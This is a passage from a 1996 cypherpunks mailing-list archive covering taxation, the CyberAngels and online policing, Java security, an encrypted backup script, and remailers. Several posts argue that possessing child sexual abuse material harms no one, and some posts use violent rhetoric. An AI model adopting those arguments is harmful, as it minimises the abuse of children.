>Soete last week cast the bit tax as a progressive levy that would fall 
>hardest on big business and that would not deter private individuals from 
>joining the information society. 

This is bullshit.  He's just trying to sucker the great unwashed into 
believing that taxing the Internet is a way to make the other guy pay the 
toll.  It won't work.

>Soete believes the bit-tax should be used to fund social security or 
>welfare.

Not a prayer!  He's trying to get the geezers to look upon the Internet as a 
cash cow.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.segno.com
Date: Sat, 4 May 1996 14:27:36 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: Late Comments.
Message-ID: <199605032031.AA03254@october.segno.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm amazed at the long thread my naive "CypherAnarchy" question
generated -- not to mention the astonishing range of perspectives,
spanning from the unusual to the bizarre.  (Yes, that was a joke.)

I haven't joined in much up to now, simply because it has taken me
some time to digest it all.  But now that the thread seems to be
winding down, I have extracted a couple of interesting points for
additional comments.

"Snow" discusses nations without borders, then asks:

> Are these the deep waters you refer to?

In part, yes.  But I think the possible definitions of "nation" and
"government" are diffusing even more broadly than you suggest.  A
paragraph which I edited from my original message went something like:
"Suppose a large multinational company finds a way to increase profits
by cutting labor costs.  To what extent does this resemble a global
'tax increase' on the world population?"

A line of thought which (skipping over a lot of boring intermediate
stuff) led me eventually to the questions, "What are taxes?" and "What
is wealth?"  Clearly, when the government exacts payment of taxes from
us, it is more than just a screwy method of recycling used currency!
Taxation, to oversimplify quite a bit, is essentially compelled labor.

But it is even more than that.  Taxes must be paid in dollars, and the
U.S. government maintains tight and detailed controls over what types
of labor and value can be converted into dollars, by whom, and how.
Therefore taxation is also compelled *behavior*.  It keeps us locked
into roles which government has significant power to shape.  In fact,
due in part to tax policies, important traditional American lifestyle
values such as "being independent" and "living off the land" have
become damn near impossible today (while "normal" forms of employment
frequently entail the waiver of important Constitutional rights).

Once taxation is seen as compelled behavior, it is natural to ask how
many other legal controls on behavior might have the effect, at least
in part, of a sort of hidden tax.  The military draft?  Seizures of
property in criminal cases?  Obviously.  But what about regulations on
industry?  Suppose Congress passes a bill which consolidates some
segment of the military industry.  Or suppose a government reserves to
itself some of the most profitable lines of business, such as drugs
and gambling.  To what extent do these actions resemble taxes?

My point being, there is more than one way to skin a cat, and clearly
more than one way to increase government wealth.  Cryptography may be
able to hide value transactions when they take the symbolic form of
money, but can crypto hide value in all its phases?  If not, then
crypto will change only the forms, not the essence, of taxation.  It
cannot shield us, for example, from outright forced labor (such as
compulsory military service) or increased criminal penalties, etc.

A final thought: Just as TV is in the business of selling eyes and
ears to advertisers, the U.S. government has long been involved in
some activities which might, to the cynical eye (such as my own),
resemble the selling of "exploitation rights" over its population to
the highest bidders.  Note that such a strategy could do a complete
end-run around any tax collection problems caused by cryptography!

"Snow" also wrote:

> Fine. So change the tactics. Instead of "Rising Up", simply use an
> ages old an respected solution. Take out the leaders. Note, I am
> _not_ suggesting Mr. Bells assination politics, rather, given a
> violent revolution, or the beginings of one, shorten it by taking
> those who make the policies you disagree with.

But who the hell ARE the real leaders, and how are we supposed to find
them?  Hint: I don't think they're the people on TV!

Politicians today aren't leaders, they are the heads of an unseen
Gorgon: If you cut one politician down, two identical copies will
spring forth in that same place!

					---  mkj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 15:06:32 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom and Security
Message-ID: <01I49XXMDSMO8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)

>Site security is not at all the only problem.  Are you not aware of spams
>and scams going on all the time?  Are you not aware that sexual predators
>operate in IRC? Or that child pornography is a world wide trading game?
>Have you never heard of email forgeries or impersonation?  What about tthe
>victims of harassment and hatred who don't know how to deal with it?  What
>about all the people who have never heard of killfiles?  Who don't know how
>to report a problem nor who to report it to?   Haven't you ever been mail
>bombed and wished you could find out who did it?

	I find it interesting that Mr. Hacher is claiming spams as a reason
for CyberAngel activities. I had sent him several examples of spams, to which
he replied with messages showing a distinct lack of knowledge (thinking I could
filter out messages from the address - which was a mailing list to which I
wish to subscribe, for instance). He then noticed my piece in CuDigest
suggesting that spams and other Internet abuse would be something proper for
the CyberAngels to be involved with - instead of the censorship they advocate.
After noticing this, he wrote me back, told me that spams were not something
that they were concerned with - they weren't a _real_ problem like pornography
- and legally enjoined me not to send mail to the CyberAngels. (I would thus
appreciate someone forwarding this mail to Mr. Hatcher; he is not visibly on
the list. In case anyone is wondering, I forwarded _at most_ one copy of each
message that I had received via email; I most certainly did not mailbomb him.)

	As has been previously pointed out, it is not possible for "sexual
predators" to commit actual crimes - as opposed to utilizing freedom of speech
and freedom of press - over the internet. There are four points that may be
made regarding child pornography:
	A. What is defined as child pornography may vary from place to place.
As an example, I believe the pornographic videos involving Traci Lords (who was
below the age of 18 when they were made) are legal to posess in most of Europe.
This difference is similar to that in ages for statutory rape; Mississipi, for
instance has one of 12. (I view this as too low, in case anyone is wondering.)
	B. Even if something is claimed to be child pornography, it may not
actually have involved the use of children. Makeup, plastic surgery, and
digital editing are all involved in the creation of such faked child
pornography; the latter two are advancing at a rapid rate. While the offering
of such as "child pornography" is a variety of fraud if compensation is
involved, somehow I doubt the CyberAngels would be much interested in
getting someone prosecuted for it.
	C. As has been pointed out by others, even if actual child pornography
is on the Net, it is not in and of itself doing any harm to children. It is
the production of actual child pornography that does so. While it may be argued
that giving child pornography a market value will encourage its production, two
counterarguments may be made to this point. First, much of the sexually
explicit images on the net are in violation of copyright; I do not believe that
the CyberAngels are trying to get people prosecuted for this. Second, driving
a market underground tends to raise prices - look at the Drug War; thus, any
reduction in supply due to illegality of the market will simply compensate the
producers more.
	D. As has been pointed out, the use of child pornography is a classic
"Horseman" (of the Four). In other words, the CyberAngels are using child
pornography as a red herring for their even more objectionable activities.

>Maybe you feel like a veterano and can afford to look condesendingly at all
>the thousands of fresh-faced netizens just arriving online and say "well if
>they can't take the heat they should stay out of the fire" - but if we are
>to call ourselves an emerging "community" then we must take responsibility
>for our city, and that means caring about other people's problems.

	I have no objection to the CyberAngels assisting victims of
alleged harrasment with such mechanisms as kill files; I have some doubt as
to their technical ability in this area. I object, however, to their more
proactive activities, such as "patrolling" and soliciting people to make
complaints about usages of free speech ("harrassment"). These involve either
attempts to cut off someone's Internet access at the ISP's level or, worse,
attempts to attract governmental attention. The first may be the right of the
ISP, unless it is governmental or has a previous contract agreement stating
otherwise; it would still be preferable if others such as the CyberAngels were
to learn the basic lesson of "mind your own business." Bringing goverment into
the matter may both result in a violation of individual civil liberties and
may result in increased governmental control over the Internet.
	As has been pointed out by others, the Cypherpunks are doing things to
help other people on the Internet in areas such as mail forgery/impersonation
and mail-bombing. (A properly run anonymous remailer will not forward a mail
bomb any more than a properly run post office will.) I sincerely doubt whether
the CyberAngels are actually doing anything about these problems as opposed to
their fetish of pornography.

>When your address is forged and you get flamed and bombed, or if you start
>receiving anonymous death threats, your freedom is under threat.  It's not
>enough to say "Well I just turn off my monitor"

>The Internet is a city - it needs 911 services and it needs Neighborhood
>Watches.  And neither professional law enforcement nor neighborhood watch
>are by definition a threat to anyone's freedom.  Freedom within the context
>of Community does not and never has meant the freedom to kill your
>neighbor, or rob someone, or rape someone, or harm someone.  In the context
>of the internet Community too, freedom is not the individual's right to do
>whatever he or she likes - because then the Community is no longer free.

	By definition? Probably not... although it depends on the definition.
Some implementations of such activities - such as the CyberAngels and their
current and proposed activities - are such. Freedom is the right to do what
will not trespass on another's freedom; I defy you to show how having
pornography available, including "obscene" material, trespasses on the freedoms
of others. I also defy you to show how having fully anonymous remailers
available is a violation of anyone's liberties.

>Freedom is under threat from two directions - from selfish individuals who
>care little for the Community, and from the over zealousness of governments
>who seek greater and greater control over individual thought and action.

>The first step is to acknowledge that we have a problem within the Internet
>Community - because if we don't address it responsibly then we have only
>ourselves to blame when the governments try to take it over.  We can face
>our problems or we can deny that they exist.

	And how, pray tell, will bringing such alleged problems to the
attention of government - as has been an activity of the CyberAngels - avoid
increased governmental intervention?

>By asking me the question: "What crime?" you are indicating to me that you
>prefer denial.

	No. We have a disagreement about what is crime - what is an exercise of
individual civil liberties, and what is a violation of them.

>"Two people may disagree, but
>that does not mean that one of them is evil"

	That depends on what they disagree. I believe we disagree in ways
that include enough fundamental freedoms that calling you evil is proper from
my viewpoint.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 May 1996 14:51:33 +0800
To: "L. Detweiler" <vznuri@netcom.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605032009.NAA22938@netcom16.netcom.com>
Message-ID: <199605032042.QAA24915@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"L.Detweiler" writes:
> but again, the Java designers never claimed that
> "Perry Metzger will be able to use Java in his mission critical
> funds transfer application".

And, Detweiler, I keep saying that I don't care about not being able
to use it there -- the problem is even having a copy of Netscape with
Java enabled on the same machine as a trading system. One instance of
Netscape running Java can endanger an entire trading floor.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 13:20:10 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <01I49Y21S0J88Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com"  3-MAY-1996 16:14:04.28

>Money is not a problem, but space is. There is never any room on a
>trading floor. Space is at an amazing premium.

	Would switchable monitors, mice, and keyboards be a possible solution
(with placement of the CPUs in another location), or are your users too
permanently technically incompetent? I would hope the latter would not be the
case given the technological nature of the modern trading field.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 May 1996 13:57:16 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <01I49Y21S0J88Y56P8@mbcl.rutgers.edu>
Message-ID: <199605032050.QAA24948@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"E. ALLEN SMITH" writes:
> From:	IN%"perry@piermont.com"  3-MAY-1996 16:14:04.28
> 
> >Money is not a problem, but space is. There is never any room on a
> >trading floor. Space is at an amazing premium.
> 
> Would switchable monitors, mice, and keyboards be a possible solution
> (with placement of the CPUs in another location), or are your users too
> permanently technically incompetent?

The users can't afford not to have the numbers they are watching not
in front of them, even for brief periods. Its a real problem.

And yes, this isn't a joke. They all eat lunch on the trading floor so
they don't have to leave their desks. They race back and forth to the
bathroom. The environment is tough.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 17:38:45 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom and Security
Message-ID: <01I49YEWVI5M8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Again, I would appreciate it if someone would forward this message to
Mr. Hatcher.

From:	IN%"angels@wavenet.com"  1-MAY-1996 09:47:03.01

>Every society has a social contract whereby the freedom of the individual
>is defined within the context of the society.  Freedom means your freedom
>to be who you want to be, think how you want to think, say what you want to
>say, hold whatever beliefs you wish, balanced against the Community's need
>for stability.  You may demand the freedom to kill those who disagree with
>you but no community will grant you that freedom.  But no one living in a
>community where murder is outlawed can serious claim that their freedom has
>been taken away by that particular law.  You cannot be free to speak your
>mind unless there are laws preventing others who disagree with you from
>killing you.  If it were permitted to kill those who disagreed with you,
>then no one would be free to speak their mind at all, for fear of the
>consequences.

	Quite simply, if freedom is defined by a social contract, then there
would be no need for a Bill of Rights. Protected freedoms are there because
even a democratically elected government - the closest thing to a determiner
of the "social contract" in the real world - cannot be trusted. For instance,
the current social contract in Germany would apper to say that some political
speech - that of neo-Nazis - is not permitted, and that this is not a violation
of freedoms. It is reasonably evident that this is not the case by any
true definition of freedom.
	Certainly, if someone can murder you for speaking your mind, your
freedom of speech may be restricted. But I again defy you to come up with how
many of the activities you oppose are violations of anyone's freedoms, as
opposed to violations of what most people happen to want.

>I am not currently aware that either your right to encrypt nor your right
>to use anon remailers is under threat, so why should I do anything?  But
>while encryption and anon remailing protect *you* from certain threats to
>your freedom, they are also being used for example to make the
>international trade in child pornography more effective and less easy to
>prosecute.  The technology itself is neutral and can be used or abused.
>That is why the focus should be on individual actions rather on the
>technology.

	It would appear that you are incorrect with regards to the right to
encrypt and anonymous remailers; such regulations and laws as ITAR restrict
this, as do some movements toward mandatory government-access-to-keys (the
eventual intended result of Clipper, which has certainly not disappeared from
the intentions of law enforcement and espionage agencies). I have previously
pointed out the ways in which the child pornography argument does not work,
and is only an excuse.

>My concern is not so much with network sabotage or infiltration (there are
>plenty enough organizations addressing that problem) but with personal
>safety within the Internet community - that means you, not your hard drive.

	I am not physically attached to the Internet; it is not possible for
my safety - as opposed to my hard drive's safety if I connected it - to be
compromised by the Internet.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 17:55:44 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <01I49YKIF9PQ8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com"  3-MAY-1996 16:49:35.61

>The users can't afford not to have the numbers they are watching not
>in front of them, even for brief periods. Its a real problem.

	Hmm.... has anyone ever created a specialized computer (or computer
running a specialized program) that would put multiple screens on the same
screen, perhaps with some GUI manipulation capabilities? If they're trying to
read Netscape material while watching the other numbers, they're then in the
exact same situation from their viewpoint.

>And yes, this isn't a joke. They all eat lunch on the trading floor so
>they don't have to leave their desks. They race back and forth to the
>bathroom. The environment is tough.

	I should have remembered this from reading Liar's Poker; thank you.
(One wonders if any of them will start using catheters...)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 16:09:37 +0800
To: liberty@gate.net
Subject: Re: Freedom and security
Message-ID: <01I49Z07F3IC8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"liberty@gate.net"  1-MAY-1996 10:34:38.08
To:	IN%"angels@wavenet.com"
CC:	IN%"cypherpunks@toad.com"
Subj:	RE: Freedom and security

Received: from toad.com by mbcl.rutgers.edu (PMDF #12194) id
 <01I46RO3HOSG8WWQG0@mbcl.rutgers.edu>; Wed, 1 May 1996 10:09 EDT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id EAA25573 for
 cypherpunks-outgoing; Wed, 1 May 1996 04:56:52 -0700 (PDT)
Received: from osceola.gate.net (root@osceola.gate.net [199.227.0.18]) by
 toad.com (8.7.5/8.7.3) with SMTP id EAA25568 for <cypherpunks@toad.com>; Wed,
 1 May 1996 04:56:44 -0700 (PDT)
Received: from miafl2-7.gate.net (miafl2-7.gate.net [199.227.2.134]) by
 osceola.gate.net (8.6.12/8.6.9) with SMTP id HAA41660; Wed,
 1 May 1996 07:55:34 -0400
Date: Wed, 01 May 1996 07:55:25 -0400
From: liberty@gate.net (Jim Ray)
Subject: RE: Freedom and security
Sender: owner-cypherpunks@toad.com
To: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Cc: cypherpunks@toad.com
Message-id: <199605011155.HAA41660@osceola.gate.net>
X-Envelope-to: eallensmith
Content-type: text/plain; charset="us-ascii"
X-Sender: liberty@pop.gate.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

CyberAngels Director Colin Gabriel Hatcher wrote:

<snips>

>>...Freedom does not increase through more laws.
>
>Nor does freedom increase through less laws or no laws.

You have gotta be kidding me, but let's start by differentiating
among laws. I'm a crypto-minarchist, not a crypto-anarchist, so
I still have hope for some (MUCH less) government. I think laws
against murder are good, and lead to more safety for those not in
jail. I think laws against "consensual crimes" are bad, and lead
to government/police corruption extending all the way to the top
[see sigfile]. When I have to say, "where's the victim?" it's a
shitty law. Many laws fail my test.

>  Freedom increases
>as respect and care for one another increases.

This is what I called flowery rhetoric in the last post.

>  Meanwhile, since we do not
>live in utopia, all societies at a certain level of economic development
>and of a certain size of population require law and law enforcement to
>protect citizens from predators.

This is what astounds me, the advocates of more government always
focus on crimes WITH obvious victims during debates. Once power
is achieved, the victimless crime laws get written. I have said
I do want murderers, and even some (not all) pedophiles, in jail.
If a child pornographer chooses to visit my page and commits a
thoughtcrime involving my babypictures, I say leave him alone. If
he commits a real crime with an unwilling victim I say punish him
even more than the present government punishes him. Libertarians,
when we achieve political power, will find ourselves with abundent
jail cells left over from the tax-and-spend drugwar to put real
criminals (the ones who have an individual victim) in.

>[...flowery rhetoric] Does anyone really doubt the extent of State
>control and power across the Net?

There are certainly enough statists who feel a need to increase it.

>
> >.... laws only breed more laws, which always lead to
>>less freedom.
>
>I disagree with this statement. I do not believe that laws breed more laws
>nor that laws lead to less freedom.  I believe bad laws compromise freedom
>(eg CDA) while good laws protect freedom.

I am heartened by your opposition to the CDA (though I did not
notice a Cyberangels voice in the debate/protest leading up to
this abominable law...) but I must point out that you offer no
good test, like my "where's the victim?" test, to differentiate
good laws from bad ones. As to more laws leading to less freedom
I stand by my words. Go down to any law library and have a look
at the Code of Federal Regulations. As wordy, poorly-written laws
proliferate, we all become "criminals," subject to the arbitrary
power of the state's prosectors. When the state prosecutors are
a partisan Democrat followed by a partisan Republican, and the
"criminals" are high-ranking Democrats and Republicans, you end
up with a lesser respect for all laws, even the good ones. Again,
see my sigfile. Now imagine the Libertarian party was doing the
same drug-smuggling...Would the feds [let alone the media] be
so silent? I doubt it.

>Cryptography enhances and protects privacy, which does not inevitably lead
>to greater security.  Security for the sender, yes, in that no one else can
>read the message, but security for the Community?

I find it worrisome that you capitalize the word, despite my rant
involving Director Freeh. I repeat: The community is made up of
individuals.

>  Doesnt that depend what
>the message said?  The technology itself is neutral.

Therefore, I guess, the "Community" must forcibly take my key
to make sure that last PGPmessage wasn't child porn, right?
It is important to make sure I don't commit thoughtcrime.

>  Child pornographers
>encrypt their hard drives so that law enforcement cannot gather crime
>evidence - that is certainly a state of greater security for the
>pornographer, but it does not improve our Community, and as child
>pornography increases, the law is by definition broken more and more, and
>so the Community becomes less free than before.  And that's not the tyranny
>of government but the tryanny of criminals.

Look. I don't care if some old man beats off to the tune of baby
pictures. There is no victim. If he finds a victim, toss him in
the slammer, or kill him. Right now, the tax-and-spend drugwar is
creating a revolving-door justice system when it comes to victim
crimes, and the people (naturally) disrespect the law. Respect
for ALL law, good and bad, is poisoned by this foolishness and
when combined with a disrespect for the historical power of
juries to nullify shitty laws, and ignorance of history.

>I do in fact support cryptography for personal security, not least because
>I can ensure that my messages are authenticated.  CyberAngels PGP public
>key will be up on our new website opening very soon.  I've had enough of
>people forging my email.

<sarcasm on>
Oh, why bother with this self-help, vigilante solution to the
need for authentication. Why not just pass another law? PGP is
a pain-in-the-ass to install and learn. I'm sure the Congress
and President Clinton (who has also experienced e-mail forgery)
would support it, and then you won't have to bother learning
PGP or reading that awful PGPdoc1 & PGPdoc2.
</sarcasm>

>"Two people may disagree, but
>that does not mean that one of them is evil"

>I think it should be legal for me to sell my body for sex, or put
>any substance into it I choose, because _I_ own my body.

	An excellent example to use with regards to the CyberAngels, given that
the Guardian Angels are very definitely pro-drug-war. This is informative about
the CyberAngels, especially considering their association with SafeSurf. Their
parental-censorship system includes the ability to filter out many articles
disagreeing with their position on the Drug War - namely those citing that
certain presently illegal substances (e.g., marijuana) are much less dangerous
than the government wishes people to believe. While I do not approve of minors
using addictive drugs (including nicotine), enabling their parents to cut off
political speech of which the parent and the CyberAngels disapprove is hardly
an increase in the real freedom of anyone.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 4 May 1996 07:58:07 +0800
To: VaX#n8 <vax@linkdead.paranoia.com>
Subject: Re: encrypted Unix backup software
In-Reply-To: <199605030102.UAA06977@linkdead.paranoia.com>
Message-ID: <318A2206.69D8BD19@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


VaX#n8 wrote:
>
> Okay, before you flame me and tell me to pipe it through
> a symmetric cipher filter, hear me out.  Tape handling is
> hairy, depending on what kind of functionality you want.  A regular
> filter may write(2) in strangely sized blocks, not working very well
> with your tape drive.

This is what I use:

        tar -c --block-compress --sparse --atime-preserve
--use-compress-program /usr/local/bin/destape  .

and /usr/local/bin/destape looks like this:

        #!/usr/local/bin/bash

        if [ -z "$1" ]
        then
                gzip | /usr/local/bin/des -bE3
        else
                /usr/local/bin/des -bD3 | gzip -d
        fi

I also back up the des/gzip/tar to unencrypted to the start of the tape
too.


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 14:22:11 +0800
To: llurch@networking.stanford.edu
Subject: Re: L. Detweiler is a CyberAngel
Message-ID: <01I49ZPY3HNK8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Richard Charles Graves"  3-MAY-1996 17:30:30.47

>Subject: L. Detweiler is a CyberAngel

>ROTFL. From 
>http://snyside.sunnyside.com/cpsr/nii/cyber-rights/Library/Announcements/CyberAngels-Safesurf

>Special mention must go to an ongoing debate about anonymous remailers, which
>was an area where we were less informed.  Thanks to  an154280@anon.penet.fi
>for lots of very helpful suggestions.  For those of you interested in the
>debate about anonymity we have two suggestions:  firstly we have a HUGE FAQ
>on "Identity, Privacy and Anonymity on the InterNet", written by L.Detweiler,
>and if any of you want it, please write to us and ask for it (WARNING it is
>138k!)  Secondly you can write to help@anon.penet.fi for their FAQ on their
>anonymous service, which is also very educational.

	I had noticed that earlier, yes... see why I think they know less about
the Net than even _I_ do?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 4 May 1996 13:58:08 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <01I49YKIF9PQ8Y56P8@mbcl.rutgers.edu>
Message-ID: <199605032136.RAA25079@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"E. ALLEN SMITH" writes:
> >And yes, this isn't a joke. They all eat lunch on the trading floor so
> >they don't have to leave their desks. They race back and forth to the
> >bathroom. The environment is tough.
> 
> 	I should have remembered this from reading Liar's Poker; thank you.
> (One wonders if any of them will start using catheters...)

Don't suggest it too loudly.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 May 1996 15:13:10 +0800
To: cypherpunks@toad.com
Subject: WhoWhere is a Fucked-Up Operation
Message-ID: <adaff6b203021004f788@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:29 PM 5/3/96, Patrick May wrote:
>Rich Graves writes:
> > For a good demonstration of why WhoWhere? is not necessarily the greatest
> > thing since spice racks, look up "Louis Freeh," "Fuck You,"  "Asshole,"
> > "System Privileged User," and "Stephen Hawking." I keep telling them that
> > they'd better remove this last, but they don't consider it a priority.
>
>     If you want further evidence of their technical skills, look up
>my name.  I'm responsible for the corp@spe.com account.  WhoWhere has
>therefore decided that I am responsible for every "corp" account in
>their database and has attached my name to each and every one.  I
>informed them of this several weeks ago but they are evidently not
>interested in cleaning up their service.
>
>     Being both socially and technically challenged, perhaps they want
>your Fucking Statist input on obtaining a government grant for a
>clue-free business.

I agree with my namesake that WhoWhere is one incredibly fucked-up operation.

I tried to add an entry for myself, and my entry has (after several days)
not made it. (I tried to be truthful, including such things as "felon" for
what I do...perhasp their Thought Police considered my entry a joke,
suggesting that they must be applying their own judgment to entries.)

I then figured that some of their "automatically generated" entries for
"Timothy C. May" needed correction. Not suprisingly, the system asked for a
password, so I was unable to correct their defective entries for me.

Fuck em. Then burn the body.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 4 May 1996 15:15:31 +0800
To: cypherpunks@toad.com
Subject: Re: PGP API & PGP 3.0
Message-ID: <v02140b01adb063920e84@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Derek Atkins (warlord@mit.edu) writes:
> The PGP Library is currently under development.  I have a draft API
> document, but it is not complete (I still need to finish documenting
> the key management functions).  I'd like to get it to a state where I
> can "publically" release it soon -- then again I've been saying that
> for a while.

Yeah...  I was thinking a few months ago that it would be fun to set up
an idea-futures claim regarding which would appear in a usable fashion
first (if ever): PGP 3.0 and it's library or the GNU Hurd...

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 4 May 1996 16:14:31 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 25 April 1996
Message-ID: <01I4A0JNONWQ8Y56P8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu" 25-APR-1996 21:40:28.52

>FCC BOOSTS PROSPECT FOR SUPERNETS
>The Federal Communications Commission may reserve a band of radio
>frequencies to allow free and unlicensed transmissions at 25 megabit speeds
>of large volumes of data within a group of buildings.  These so-called
>"supernet" wireless services, which would operate at no more than one watt
>of power in order to avoid interfering with neighboring supernets, could
>then be connected by high-speed phone lines to the Internet, thus largely
>bypassing local phone companies to get Net access.  (New York Times 25 Apr
>96 C1)

	If these are not covered by the regulations against encryption in
the use of packet radio, this would seem to be an opening for such. Indeed,
encryption of radio messages would appear to be rather critical for security.

>HARDWARE SOLUTION TO E-COMMERCE SECURITY
>VLSI Technology and Tandem Computer's Atalla are developing chip-level
>security products to protect electronic transactions over the Internet and
>intranets.  The products will incorporate DES, RSA and other encryption
>technology, and the companies hope their joint venture will establish a
>hardware-based security standard for electronic commerce.  (Information Week
>15 Apr 96 p34)

>INTERNET PHONE FACES REGULATORY FIGHT
>The Canadian communications regulatory agency says companies offering online
>phone services must pay a fee to local phone companies to help keep local
>phone rates low.  ShadowTel, the small Ontario company which recently
>announced it planned to offer telephone service on the  Internet, appears
>headed toward a fight with federal regulators over whether it must pay a
>special fee to Canada's phone companies.  (Toronto Globe & Mail 25 Apr 96 B10)

	The usual egalitarian excuse to limit markets from doing what is right.
	-Allen

>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Pierre Boulle (if your name is Pierre Boulle;  otherwise, substitute your
>own name).  ...  To cancel, send a message to: listproc@educom.unc.edu with
>the message: unsubscribe edupage.   (If you have subscription problems, send
>mail to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 4 May 1996 15:12:17 +0800
To: cypherpunks@toad.com
Subject: An interesting front end for the replay remailer
Message-ID: <Pine.GUL.3.93.960503172938.20948K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


These folks' politics don't make much sense to me (but I gather that they
really, really don't like Jehova's Witnesses); it's their setting up an
"alternative" front end for the replay remailer that caught my interest.

 http://www.nano.no/~telemark/anon.html

One could say that this makes a case for PGP-signing web pages, but on the
other hand, the remailers don't and shouldn't care about content, so who
cares if someone "misappropriates" a remailer. What are they "taking"
anyway?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 4 May 1996 15:20:08 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <adaff858040210045a9e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 PM 5/3/96, Black Unicorn wrote:

>> "Decently on the ball"? I hope you are being ironic.
>
>Not at all.  (Did you mean sarcastic?)  His staff are some of the most

"irony n. 1. the expression of one's meaning by language of the opposite or
a different tendency, e.g., adoption of a laudatory tone for the purpose of
ridicule."

--Oxford

I was actually being facetious (one of the several sub-classes of irony)
when I asked if you were being ironic, to make a point.

On your other points, we mostly agree.

I was just emphasizing the Senator Patrick Leahy pushed the bill that make
